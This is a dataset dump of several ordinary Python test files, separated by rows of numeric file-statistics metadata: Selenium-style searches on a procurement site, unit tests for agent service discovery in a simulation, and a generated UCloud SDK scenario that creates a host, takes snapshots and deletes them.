    app.testHelperSMSearch.expand_show_hide()
    # Container search args: total containers + 1, container index
    # (0 = random pick), row index within the container (0 = random pick).
    name = 'ETPRF'
    app.testHelperSMSearch.select_first_publish_date(5, 0)
    app.testHelperSMSearch.find_torgovaya_ploschadka(name)
    app.testHelperSMSearch.press_search_button()
    assert app.testHelperSMSearch.check_results() != '0'
    # Threshold scales with the current day of the month (100 per day).
    assert int(app.testHelperSMSearch.check_results()) > int(app.testHelperSMSearch.current_date_time_day())*100
def test_sm_etprf_without_eic_current_month(app):
    """Same "current month" ETPRF search with three extra container
    filters (the "without EIC" variant); threshold ~20 per elapsed day."""
    app.testhelpersm.refresh_page()
    app.session.open_SM_page(app.smPurchases)
    app.session.ensure_login_sm(app.username, app.password)
    # NOTE(review): duplicated ensure_login_sm call — presumably a
    # flaky-login workaround; confirm if still needed.
    app.session.ensure_login_sm(app.username, app.password)
    app.session.open_SM_page(app.smPurchases)
    app.testHelperSMSearch.expand_show_hide()
    # Container search args: total containers + 1, container index
    # (0 = random pick), row index within the container (0 = random pick).
    name = 'ETPRF'
    app.testHelperSMSearch.select_first_publish_date(5, 0)
    app.testHelperSMSearch.find_torgovaya_ploschadka(name)
    app.testHelperSMSearch.find_in_container_number(11, 2, 1)
    app.testHelperSMSearch.find_in_container_number(11, 6, 3)
    app.testHelperSMSearch.find_in_container_number(11, 6, 4)
    app.testHelperSMSearch.press_search_button()
    assert app.testHelperSMSearch.check_results() != '0'
    # Threshold scales with the current day of the month (20 per day).
    assert int(app.testHelperSMSearch.check_results()) > int(app.testHelperSMSearch.current_date_time_day())*20
def test_sm_etprf_include_eic_prev_month(app):
    """Search ETPRF purchases with publish-date option (6, 0) — per the
    test name, "previous month" — and expect more than 3500 results."""
    app.testhelpersm.refresh_page()
    app.session.open_SM_page(app.smPurchases)
    app.session.ensure_login_sm(app.username, app.password)
    # NOTE(review): duplicated ensure_login_sm call — presumably a
    # flaky-login workaround; confirm if still needed.
    app.session.ensure_login_sm(app.username, app.password)
    app.session.open_SM_page(app.smPurchases)
    app.testHelperSMSearch.expand_show_hide()
    # Container search args: total containers + 1, container index
    # (0 = random pick), row index within the container (0 = random pick).
    name = 'ETPRF'
    app.testHelperSMSearch.select_first_publish_date(6, 0)
    app.testHelperSMSearch.find_torgovaya_ploschadka(name)
    app.testHelperSMSearch.press_search_button()
    assert app.testHelperSMSearch.check_results() != '0'
    assert int(app.testHelperSMSearch.check_results()) > 3500
def test_sm_etprf_without_eic_prev_month(app):
    """Same "previous month" ETPRF search with three extra container
    filters (the "without EIC" variant); expect > 600 results."""
    app.testhelpersm.refresh_page()
    app.session.open_SM_page(app.smPurchases)
    app.session.ensure_login_sm(app.username, app.password)
    # NOTE(review): duplicated ensure_login_sm call — presumably a
    # flaky-login workaround; confirm if still needed.
    app.session.ensure_login_sm(app.username, app.password)
    app.session.open_SM_page(app.smPurchases)
    app.testHelperSMSearch.expand_show_hide()
    # Container search args: total containers + 1, container index
    # (0 = random pick), row index within the container (0 = random pick).
    name = 'ETPRF'
    app.testHelperSMSearch.select_first_publish_date(6, 0)
    app.testHelperSMSearch.find_torgovaya_ploschadka(name)
    app.testHelperSMSearch.find_in_container_number(11, 2, 1)
    app.testHelperSMSearch.find_in_container_number(11, 6, 3)
    app.testHelperSMSearch.find_in_container_number(11, 6, 4)
    app.testHelperSMSearch.press_search_button()
    assert app.testHelperSMSearch.check_results() != '0'
    assert int(app.testHelperSMSearch.check_results()) > 600
| 48.021277
| 112
| 0.772818
| 1,187
| 9,028
| 5.617523
| 0.062342
| 0.242502
| 0.093731
| 0.04799
| 0.99865
| 0.99865
| 0.986053
| 0.979304
| 0.979304
| 0.979304
| 0
| 0.019361
| 0.130372
| 9,028
| 188
| 113
| 48.021277
| 0.829958
| 0.154962
| 0
| 0.903448
| 0
| 0
| 0.007889
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 1
| 0.068966
| false
| 0.137931
| 0
| 0
| 0.068966
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
1e99308ac1e7db45f504c3ecd96b9eaf81a98fed
| 5,217
|
py
|
Python
|
tests/services.py
|
mabdi/VirtIOT
|
44a9336db16761a446517bbcd59b2f5dd7fe2216
|
[
"MIT"
] | 1
|
2018-08-04T17:13:02.000Z
|
2018-08-04T17:13:02.000Z
|
tests/services.py
|
mabdi/CSIoT
|
44a9336db16761a446517bbcd59b2f5dd7fe2216
|
[
"MIT"
] | null | null | null |
tests/services.py
|
mabdi/CSIoT
|
44a9336db16761a446517bbcd59b2f5dd7fe2216
|
[
"MIT"
] | null | null | null |
import unittest
from core import app,agent,simulation
from core.common import get_conn
class ServicesTestCase(unittest.TestCase):
    """Integration tests: agents discover and consume services through
    friendship chains of increasing depth (friend, friend-of-friend,
    friend-of-friend-of-friend).

    The original tests repeated ~30 lines of identical agent setup per
    test; that duplication is factored into private helpers below. Test
    method names and assertions are unchanged.
    """

    # Placement presets per agent name: (x, y, owner, batch, locality).
    # Values copied verbatim from the original inline setup.
    _PRESETS = {
        "a": (100, 100, 50, 50, 100),
        "b": (450, 100, 50, 51, 100),
        "c": (950, 100, 52, 51, 50),
        "d": (950, 400, 52, 54, 50),
    }

    def _spawn_agents(self, *names):
        """Reset the simulated world, create and register one agent per
        name using its preset placement, and return the DB handle."""
        agent.deleteAll()
        simulation.clear_all_messages()
        simulation.reset_ts()
        for name in names:
            x, y, owner, batch, locality = self._PRESETS[name]
            template = agent.random_agent()
            template["agentName"] = name
            template["agentX"] = str(x)
            template["agentY"] = str(y)
            template["agentOwner"] = str(owner)
            template["agentBatch"] = str(batch)
            template["agentLocality"] = str(locality)
            agent.new_agent(0, template)
        return get_conn()

    @staticmethod
    def _set_services(db, name, need=None, offer=None):
        """Overwrite an agent's service needs and/or offers in the DB."""
        if need is not None:
            db.agents.find_one_and_update(
                {"name": name}, {"$set": {"service_need": need}})
        if offer is not None:
            db.agents.find_one_and_update(
                {"name": name}, {"$set": {"service_offer": offer}})

    @staticmethod
    def _agents_by_name(db):
        """Snapshot all agent documents, keyed by agent name."""
        return {doc["name"]: doc for doc in db.agents.find()}

    def test_consume_f(self):
        """consume friend services test"""
        db = self._spawn_agents("a", "b")
        self._set_services(db, "a", need={"10": None})
        self._set_services(db, "b", offer=["10"])
        simulation.start(3)
        ag = self._agents_by_name(db)
        self.assertIn("a", ag["b"]["friendships"])
        self.assertIn("b", ag["a"]["friendships"])
        self.assertEqual("b", ag["a"]["service_need"]["10"])

    def test_consume_ff(self):
        """consume friend of friends services test"""
        db = self._spawn_agents("a", "b", "c")
        self._set_services(db, "a", need={"10": None}, offer=["5"])
        self._set_services(db, "b", need={"20": None}, offer=["11"])
        self._set_services(db, "c", need={"12": None}, offer=["10"])
        simulation.start(3)
        ag = self._agents_by_name(db)
        print(ag)  # kept from the original for debugging on failure
        self.assertIn("a", ag["b"]["friendships"])
        self.assertIn("b", ag["a"]["friendships"])
        self.assertIn("c", ag["b"]["friendships"])
        self.assertEqual("c", ag["a"]["service_need"]["10"])

    def test_consume_fff(self):
        """consume friend of friend of friends services test"""
        db = self._spawn_agents("a", "b", "c", "d")
        self._set_services(db, "a", need={"10": None}, offer=["5"])
        self._set_services(db, "b", need={"20": None}, offer=["11"])
        self._set_services(db, "c", need={"12": None}, offer=["13"])
        self._set_services(db, "d", need={"15": None}, offer=["10"])
        simulation.start(3)
        ag = self._agents_by_name(db)
        self.assertIn("a", ag["b"]["friendships"])
        self.assertIn("b", ag["a"]["friendships"])
        self.assertIn("c", ag["b"]["friendships"])
        self.assertIn("d", ag["c"]["friendships"])
        self.assertEqual("d", ag["a"]["service_need"]["10"])
| 32.203704
| 87
| 0.560092
| 703
| 5,217
| 4.008535
| 0.112376
| 0.053939
| 0.080908
| 0.085167
| 0.889283
| 0.883605
| 0.883605
| 0.883605
| 0.860894
| 0.860894
| 0
| 0.039483
| 0.213533
| 5,217
| 161
| 88
| 32.403727
| 0.647331
| 0.022618
| 0
| 0.801587
| 0
| 0
| 0.205865
| 0
| 0
| 0
| 0
| 0
| 0.095238
| 1
| 0.02381
| false
| 0
| 0.02381
| 0
| 0.055556
| 0.007937
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1eb6a8de3d14221782fc2a2b6f6163290af599a8
| 20,257
|
py
|
Python
|
tests/test_services/test_set_867.py
|
yangyimincn/ucloud-sdk-python3
|
9732d67f32ec5f46467458ba655c44c193a6bbff
|
[
"Apache-2.0"
] | 37
|
2019-06-19T09:41:34.000Z
|
2022-02-18T08:06:00.000Z
|
tests/test_services/test_set_867.py
|
yangyimincn/ucloud-sdk-python3
|
9732d67f32ec5f46467458ba655c44c193a6bbff
|
[
"Apache-2.0"
] | 90
|
2019-08-09T09:27:33.000Z
|
2022-03-30T15:54:55.000Z
|
tests/test_services/test_set_867.py
|
yangyimincn/ucloud-sdk-python3
|
9732d67f32ec5f46467458ba655c44c193a6bbff
|
[
"Apache-2.0"
] | 19
|
2019-06-13T02:46:01.000Z
|
2021-11-01T07:22:18.000Z
|
""" Code is generated by ucloud-model, DO NOT EDIT IT. """
import pytest
import logging
from ucloud.core import exc
from ucloud.testing import env, funcs, op, utest
logger = logging.getLogger(__name__)  # module-level logger, per convention
scenario = utest.Scenario(867)  # scenario #867; step functions below register via @scenario.step
@pytest.mark.skipif(env.is_ut(), reason=env.get_skip_reason())
def test_set_867(client: utest.Client, variables: dict):
    """Entry point: seed scenario variables (snapshot names/descriptions,
    base64 passwords, uhost name, image-id lookup macro) and run every
    registered step against the live API. Generated code — do not edit."""
    scenario.initial(variables)
    scenario.variables["Password"] = "Z3VhbmxpeXVhbm1pbWExMjMhQCM="
    scenario.variables["SnapshotSysName"] = "snapshot-ARK-SYS-01"
    scenario.variables["SnapshotSysDesc"] = "snapshot-ARK-SYS-01-desc"
    scenario.variables["SnapDiskType"] = "LocalBoot"
    scenario.variables["SnapshotDataNameModify"] = "snapshot-ARK-DATA-01-modify"
    scenario.variables[
        "SnapshotDataDescModify"
    ] = "snapshot-ARK-DATA-01-desc-Modify"
    scenario.variables["UhostName"] = "uhost-snapshot-ARK-auto-api-1"
    scenario.variables["SnapshotDataName"] = "snapshot-ARK-DATA-01"
    scenario.variables["SnapshotDataDesc"] = "snapshot-ARK-DATA-01-desc"
    scenario.variables[
        "CreateFromTimeMachinePassword"
    ] = "Z3VhbmxpeXVhbm1pbWExMjMhQCM="
    scenario.variables["ImageID"] = "#{u_get_image_resource($Region,$Zone)}"
    scenario.run(client)
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=False,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "DescribeImageResponse"),
    ],
    action="DescribeImage",
)
def describe_image_00(client: utest.Client, variables: dict):
    """Step 00: look up a base Linux image and stash its id in ImageID."""
    d = {
        "Zone": variables.get("Zone"),
        "Region": variables.get("Region"),
        "OsType": "Linux",
        "ImageType": "Base",
    }
    try:
        resp = client.uhost().describe_image(d)
    except exc.RetCodeException as e:
        resp = e.json()  # error responses are still validated by the step
    variables["ImageID"] = utest.value_at_path(resp, "ImageSet.0.ImageId")
    return resp
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [("str_eq", "RetCode", 0)],
    action="CreateUHostInstance",
)
def create_uhost_instance_01(client: utest.Client, variables: dict):
    """Step 01: create a uhost (no time machine yet) and stash its id in hostId."""
    d = {
        "Zone": variables.get("Zone"),
        "TimemachineFeature": "no",
        "Region": variables.get("Region"),
        "Password": "VXFhNzg5VGVzdCFAIyQ7LA==",
        "Name": variables.get("UhostName"),
        "Memory": 1024,
        "LoginMode": "Password",
        "ImageId": variables.get("ImageID"),
        "HotplugFeature": False,
        "GPU": False,
        "DiskSpace": 10,
        "CPU": 1,
    }
    try:
        resp = client.uhost().create_uhost_instance(d)
    except exc.RetCodeException as e:
        resp = e.json()
    variables["hostId"] = utest.value_at_path(resp, "UHostIds.0")
    return resp
@scenario.step(
    max_retries=100,
    retry_interval=30,
    startup_delay=10,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "UHostSet.0.State", "Running"),
        ("str_eq", "UHostSet.0.TimemachineFeature", "no"),
        ("str_eq", "UHostSet.0.BootDiskState", "Normal"),
    ],
    action="DescribeUHostInstance",
)
def describe_uhost_instance_02(client: utest.Client, variables: dict):
    """Step 02: poll until the host is Running with time machine off (see validators)."""
    d = {
        "Zone": variables.get("Zone"),
        "UHostIds": [variables.get("hostId")],
        "Region": variables.get("Region"),
    }
    try:
        resp = client.uhost().describe_uhost_instance(d)
    except exc.RetCodeException as e:
        resp = e.json()
    return resp
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "StopUHostInstanceResponse"),
    ],
    action="StopUHostInstance",
)
def stop_uhost_instance_03(client: utest.Client, variables: dict):
    """Step 03: stop the host (required before upgrading to data ark)."""
    d = {
        "Zone": variables.get("Zone"),
        "UHostId": variables.get("hostId"),
        "Region": variables.get("Region"),
    }
    try:
        resp = client.uhost().stop_uhost_instance(d)
    except exc.RetCodeException as e:
        resp = e.json()
    return resp
@scenario.step(
    max_retries=10,
    retry_interval=10,
    startup_delay=10,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "UHostSet.0.State", "Stopped"),
    ],
    action="DescribeUHostInstance",
)
def describe_uhost_instance_04(client: utest.Client, variables: dict):
    """Step 04: poll until the host reports Stopped (see validators)."""
    d = {
        "Zone": variables.get("Zone"),
        "UHostIds": [variables.get("hostId")],
        "Region": variables.get("Region"),
    }
    try:
        resp = client.uhost().describe_uhost_instance(d)
    except exc.RetCodeException as e:
        resp = e.json()
    return resp
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "UpgradeToArkUHostInstanceResponse"),
    ],
    action="UpgradeToArkUHostInstance",
)
def upgrade_to_ark_uhost_instance_05(client: utest.Client, variables: dict):
    """Step 05: upgrade the stopped host to ARK (data-ark/time-machine backup)."""
    d = {
        "Zone": variables.get("Zone"),
        "UHostIds": [variables.get("hostId")],
        "Region": variables.get("Region"),
    }
    try:
        resp = client.uhost().upgrade_to_ark_uhost_instance(d)
    except exc.RetCodeException as e:
        resp = e.json()
    return resp
@scenario.step(
    max_retries=200,
    retry_interval=30,
    startup_delay=100,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "UHostSet.0.State", "Stopped"),
        ("str_eq", "UHostSet.0.TimemachineFeature", "yes"),
        ("str_eq", "UHostSet.0.BootDiskState", "Normal"),
        ("str_eq", "UHostSet.0.DiskSet.0.BackupType", "DATAARK"),
    ],
    action="DescribeUHostInstance",
)
def describe_uhost_instance_06(client: utest.Client, variables: dict):
    """Step 06: poll (long timeout) until the ARK upgrade is reflected — time
    machine on and DATAARK backup type (see validators)."""
    d = {
        "Zone": variables.get("Zone"),
        "UHostIds": [variables.get("hostId")],
        "Region": variables.get("Region"),
    }
    try:
        resp = client.uhost().describe_uhost_instance(d)
    except exc.RetCodeException as e:
        resp = e.json()
    return resp
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "StartUHostInstanceResponse"),
    ],
    action="StartUHostInstance",
)
def start_uhost_instance_07(client: utest.Client, variables: dict):
    """Step 07: start the host again after the ARK upgrade."""
    d = {
        "Zone": variables.get("Zone"),
        "UHostId": variables.get("hostId"),
        "Region": variables.get("Region"),
    }
    try:
        resp = client.uhost().start_uhost_instance(d)
    except exc.RetCodeException as e:
        resp = e.json()
    return resp
@scenario.step(
    max_retries=30,
    retry_interval=30,
    startup_delay=10,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "UHostSet.0.State", "Running"),
        ("str_eq", "UHostSet.0.TimemachineFeature", "yes"),
        ("str_eq", "UHostSet.0.DiskSet.0.BackupType", "DATAARK"),
    ],
    action="DescribeUHostInstance",
)
def describe_uhost_instance_08(client: utest.Client, variables: dict):
    """Step 08: poll until the host is Running with ARK enabled (see validators)."""
    d = {
        "Zone": variables.get("Zone"),
        "UHostIds": [variables.get("hostId")],
        "Region": variables.get("Region"),
    }
    try:
        resp = client.uhost().describe_uhost_instance(d)
    except exc.RetCodeException as e:
        resp = e.json()
    return resp
@scenario.step(
    max_retries=60,
    retry_interval=60,
    startup_delay=100,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "DescribeUhostTmMetaResponse"),
        ("str_eq", "UtmStatus", "normal"),
    ],
    action="DescribeUhostTmMeta",
)
def describe_uhost_tm_meta_09(client: utest.Client, variables: dict):
    """Step 09: wait for time-machine metadata to be 'normal', then stash the
    system and data vdisk ids (VdiskIdSys / VdiskIdData)."""
    d = {
        "Zone": variables.get("Zone"),
        "UhostId": variables.get("hostId"),
        "Region": variables.get("Region"),
    }
    try:
        resp = client.invoke("DescribeUhostTmMeta", d)
    except exc.RetCodeException as e:
        resp = e.json()
    variables["VdiskIdSys"] = utest.value_at_path(resp, "DataSet.0.VdiskId")
    variables["VdiskIdData"] = utest.value_at_path(resp, "DataSet.1.VdiskId")
    return resp
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "DescribeVDiskTmListResponse"),
    ],
    action="DescribeVDiskTmList",
)
def describe_v_disk_tm_list_10(client: utest.Client, variables: dict):
    """Step 10: list time-machine snapshots for the system vdisk."""
    d = {
        "Zone": variables.get("Zone"),
        "VDiskId": variables.get("VdiskIdSys"),
        "SnapshotType": "all",
        "Region": variables.get("Region"),
    }
    try:
        resp = client.invoke("DescribeVDiskTmList", d)
    except exc.RetCodeException as e:
        resp = e.json()
    return resp
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "DescribeVDiskTmListResponse"),
    ],
    action="DescribeVDiskTmList",
)
def describe_v_disk_tm_list_11(client: utest.Client, variables: dict):
    """Step 11: list time-machine snapshots for the data vdisk."""
    d = {
        "Zone": variables.get("Zone"),
        "VDiskId": variables.get("VdiskIdData"),
        "SnapshotType": "all",
        "Region": variables.get("Region"),
    }
    try:
        resp = client.invoke("DescribeVDiskTmList", d)
    except exc.RetCodeException as e:
        resp = e.json()
    return resp
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "CreateUserVDiskSnapshotResponse"),
    ],
    action="CreateUserVDiskSnapshot",
)
def create_user_v_disk_snapshot_12(client: utest.Client, variables: dict):
    """Step 12: snapshot the system vdisk; stash the id in VdiskSnapIDSys."""
    d = {
        "Zone": variables.get("Zone"),
        "VDiskId": variables.get("VdiskIdSys"),
        "Region": variables.get("Region"),
        "Name": variables.get("SnapshotSysName"),
        "Comment": variables.get("SnapshotSysDesc"),
    }
    try:
        resp = client.invoke("CreateUserVDiskSnapshot", d)
    except exc.RetCodeException as e:
        resp = e.json()
    variables["VdiskSnapIDSys"] = utest.value_at_path(resp, "SnapshotId.0")
    return resp
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "CreateUserVDiskSnapshotResponse"),
    ],
    action="CreateUserVDiskSnapshot",
)
def create_user_v_disk_snapshot_13(client: utest.Client, variables: dict):
    """Step 13: snapshot the data vdisk; stash the id in VdiskSnapIDData."""
    d = {
        "Zone": variables.get("Zone"),
        "VDiskId": variables.get("VdiskIdData"),
        "Region": variables.get("Region"),
        "Name": variables.get("SnapshotDataName"),
        "Comment": variables.get("SnapshotDataDesc"),
    }
    try:
        resp = client.invoke("CreateUserVDiskSnapshot", d)
    except exc.RetCodeException as e:
        resp = e.json()
    variables["VdiskSnapIDData"] = utest.value_at_path(resp, "SnapshotId.0")
    return resp
@scenario.step(
    max_retries=30,
    retry_interval=30,
    startup_delay=10,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "DescribeSnapshotResponse"),
        (
            "str_eq",
            "UHostSnapshotSet.0.SnapshotId",
            variables.get("VdiskSnapIDSys"),
        ),
        (
            "str_eq",
            "UHostSnapshotSet.0.SnapshotName",
            variables.get("SnapshotSysName"),
        ),
        ("str_eq", "UHostSnapshotSet.0.DiskType", "LocalBoot"),
        (
            "str_eq",
            "UHostSnapshotSet.0.ResourceName",
            variables.get("UhostName"),
        ),
        (
            "str_eq",
            "UHostSnapshotSet.0.SnapshotDescription",
            variables.get("SnapshotSysDesc"),
        ),
        ("str_eq", "UHostSnapshotSet.0.State", "Normal"),
    ],
    action="DescribeSnapshot",
)
def describe_snapshot_14(client: utest.Client, variables: dict):
    """Step 14: poll until the system-disk snapshot reaches Normal and its
    fields match what step 12 requested (see validators)."""
    d = {
        "Zone": variables.get("Zone"),
        "UHostId": variables.get("hostId"),
        "SnapshotIds": [variables.get("VdiskSnapIDSys")],
        "Region": variables.get("Region"),
    }
    try:
        resp = client.invoke("DescribeSnapshot", d)
    except exc.RetCodeException as e:
        resp = e.json()
    return resp
@scenario.step(
    max_retries=30,
    retry_interval=10,
    startup_delay=10,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "DescribeSnapshotResponse"),
        (
            "str_eq",
            "UHostSnapshotSet.0.SnapshotId",
            variables.get("VdiskSnapIDData"),
        ),
        (
            "str_eq",
            "UHostSnapshotSet.0.SnapshotName",
            variables.get("SnapshotDataName"),
        ),
        ("str_eq", "UHostSnapshotSet.0.DiskType", "LocalData"),
        (
            "str_eq",
            "UHostSnapshotSet.0.ResourceName",
            variables.get("UhostName"),
        ),
        (
            "str_eq",
            "UHostSnapshotSet.0.SnapshotDescription",
            variables.get("SnapshotDataDesc"),
        ),
        ("str_eq", "UHostSnapshotSet.0.State", "Normal"),
    ],
    action="DescribeSnapshot",
)
def describe_snapshot_15(client: utest.Client, variables: dict):
    """Step 15: poll until the data-disk snapshot reaches Normal and its
    fields match what step 13 requested (see validators)."""
    d = {
        "Zone": variables.get("Zone"),
        "UHostId": variables.get("hostId"),
        "SnapshotIds": [variables.get("VdiskSnapIDData")],
        "Region": variables.get("Region"),
    }
    try:
        resp = client.invoke("DescribeSnapshot", d)
    except exc.RetCodeException as e:
        resp = e.json()
    return resp
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "ModifySnapshotResponse"),
    ],
    action="ModifySnapshot",
)
def modify_snapshot_16(client: utest.Client, variables: dict):
    """Rename and re-describe the data-disk snapshot with the *Modify values.

    RetCode errors are converted to their JSON payload for the validators.
    """
    request = {
        "Zone": variables.get("Zone"),
        "SnapshotName": variables.get("SnapshotDataNameModify"),
        "SnapshotId": variables.get("VdiskSnapIDData"),
        "SnapshotDescription": variables.get("SnapshotDataDescModify"),
        "Region": variables.get("Region"),
    }
    try:
        return client.invoke("ModifySnapshot", request)
    except exc.RetCodeException as e:
        return e.json()
@scenario.step(
    max_retries=3,
    retry_interval=10,
    startup_delay=10,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "DescribeSnapshotResponse"),
        ("str_eq", "UHostSnapshotSet.0.SnapshotId", variables.get("VdiskSnapIDData")),
        ("str_eq", "UHostSnapshotSet.0.SnapshotName", variables.get("SnapshotDataNameModify")),
        ("str_eq", "UHostSnapshotSet.0.DiskType", "LocalData"),
        ("str_eq", "UHostSnapshotSet.0.ResourceName", variables.get("UhostName")),
        ("str_eq", "UHostSnapshotSet.0.SnapshotDescription", variables.get("SnapshotDataDescModify")),
        ("str_eq", "UHostSnapshotSet.0.State", "Normal"),
    ],
    action="DescribeSnapshot",
)
def describe_snapshot_17(client: utest.Client, variables: dict):
    """Verify the data-disk snapshot now carries the modified name/description.

    RetCode errors are converted to their JSON payload for the validators.
    """
    request = {
        "Zone": variables.get("Zone"),
        "UHostId": variables.get("hostId"),
        "SnapshotIds": [variables.get("VdiskSnapIDData")],
        "Region": variables.get("Region"),
    }
    try:
        return client.invoke("DescribeSnapshot", request)
    except exc.RetCodeException as e:
        return e.json()
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "DeleteSnapshotResponse"),
    ],
    action="DeleteSnapshot",
)
def delete_snapshot_18(client: utest.Client, variables: dict):
    """Delete the system-disk snapshot created earlier in the scenario.

    RetCode errors are converted to their JSON payload for the validators.
    """
    request = {
        "Zone": variables.get("Zone"),
        "SnapshotId": variables.get("VdiskSnapIDSys"),
        "Region": variables.get("Region"),
    }
    try:
        return client.invoke("DeleteSnapshot", request)
    except exc.RetCodeException as e:
        return e.json()
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "DeleteSnapshotResponse"),
    ],
    action="DeleteSnapshot",
)
def delete_snapshot_19(client: utest.Client, variables: dict):
    """Delete the data-disk snapshot created earlier in the scenario.

    RetCode errors are converted to their JSON payload for the validators.
    """
    request = {
        "Zone": variables.get("Zone"),
        "SnapshotId": variables.get("VdiskSnapIDData"),
        "Region": variables.get("Region"),
    }
    try:
        return client.invoke("DeleteSnapshot", request)
    except exc.RetCodeException as e:
        return e.json()
@scenario.step(
    max_retries=3,
    retry_interval=30,
    startup_delay=10,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "DescribeSnapshotResponse"),
        ("object_not_contains", "UHostSnapshotSet", variables.get("VdiskSnapIDSys")),
        ("object_not_contains", "UHostSnapshotSet", variables.get("VdiskSnapIDData")),
    ],
    action="DescribeSnapshot",
)
def describe_snapshot_20(client: utest.Client, variables: dict):
    """List all snapshots and confirm the two deleted ones are gone.

    RetCode errors are converted to their JSON payload for the validators.
    """
    request = {
        "Zone": variables.get("Zone"),
        "Region": variables.get("Region"),
    }
    try:
        return client.invoke("DescribeSnapshot", request)
    except exc.RetCodeException as e:
        return e.json()
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "StopUHostInstanceResponse"),
    ],
    action="StopUHostInstance",
)
def stop_uhost_instance_21(client: utest.Client, variables: dict):
    """Request a stop of the scenario's UHost instance via the uhost client.

    RetCode errors are converted to their JSON payload for the validators.
    """
    request = {
        "Zone": variables.get("Zone"),
        "UHostId": variables.get("hostId"),
        "Region": variables.get("Region"),
    }
    uhost = client.uhost()
    try:
        return uhost.stop_uhost_instance(request)
    except exc.RetCodeException as e:
        return e.json()
@scenario.step(
    max_retries=30,
    retry_interval=10,
    startup_delay=10,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "UHostSet.0.State", "Stopped"),
    ],
    action="DescribeUHostInstance",
)
def describe_uhost_instance_22(client: utest.Client, variables: dict):
    """Poll the UHost instance until the validators see it in Stopped state.

    RetCode errors are converted to their JSON payload for the validators.
    """
    request = {
        "Zone": variables.get("Zone"),
        "UHostIds": [variables.get("hostId")],
        "Region": variables.get("Region"),
    }
    uhost = client.uhost()
    try:
        return uhost.describe_uhost_instance(request)
    except exc.RetCodeException as e:
        return e.json()
@scenario.step(
    max_retries=3,
    retry_interval=1,
    startup_delay=0,
    fast_fail=True,
    validators=lambda variables: [
        ("str_eq", "RetCode", 0),
        ("str_eq", "Action", "TerminateUHostInstanceResponse"),
    ],
    action="TerminateUHostInstance",
)
def terminate_uhost_instance_23(client: utest.Client, variables: dict):
    """Terminate the stopped UHost instance to tear the scenario down.

    RetCode errors are converted to their JSON payload for the validators.
    """
    request = {
        "Zone": variables.get("Zone"),
        "UHostId": variables.get("hostId"),
        "Region": variables.get("Region"),
    }
    uhost = client.uhost()
    try:
        return uhost.terminate_uhost_instance(request)
    except exc.RetCodeException as e:
        return e.json()
| 26.514398
| 80
| 0.603791
| 2,065
| 20,257
| 5.779177
| 0.104116
| 0.09452
| 0.035613
| 0.054466
| 0.81691
| 0.795039
| 0.774342
| 0.761019
| 0.756913
| 0.756913
| 0
| 0.016124
| 0.246828
| 20,257
| 763
| 81
| 26.549148
| 0.766075
| 0.002468
| 0
| 0.738204
| 1
| 0
| 0.241943
| 0.092183
| 0
| 0
| 0
